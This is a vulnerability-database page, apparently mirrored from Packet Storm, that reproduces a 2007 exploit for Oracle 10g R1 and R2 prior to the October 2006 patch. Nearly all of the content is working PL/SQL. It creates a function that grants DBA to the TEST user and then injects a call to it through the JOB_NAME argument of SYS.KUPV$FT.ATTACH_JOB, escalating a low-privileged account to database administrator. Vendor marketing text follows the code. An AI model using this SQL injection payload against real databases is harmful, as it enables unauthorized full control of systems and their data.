Lucene search
K

oracle10g-1.txt

🗓️ 24 Jan 2007 00:00:00Reported by Joxean KoretType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Exploit for Oracle10g R1 and R2 pre CPU Oct 2006, execute with elevated privileges, attaches job for unauthorized acces

Code
`/**  
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006  
* Joxean Koret <[email protected]>  
* Privileges needed:  
*  
* - EXECUTE_CATALOG_ROLE  
* - CREATE PROCEDURE  
*  
*/  
select *  
from user_role_privs  
;  
  
CREATE OR REPLACE FUNCTION F1  
RETURN NUMBER AUTHID CURRENT_USER  
IS  
PRAGMA AUTONOMOUS_TRANSACTION;  
BEGIN  
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';  
COMMIT;  
RETURN(1);  
END;  
/  
  
DECLARE  
USER_NAME VARCHAR2(200);  
JOB_NAME VARCHAR2(200);  
NEW_JOB BOOLEAN;  
v_Return NUMBER;  
BEGIN  
USER_NAME := 'OWNER';  
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';  
  
v_Return := SYS.KUPV$FT.ATTACH_JOB(  
USER_NAME => USER_NAME,  
JOB_NAME => JOB_NAME,  
NEW_JOB => NEW_JOB  
);  
END;  
/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
26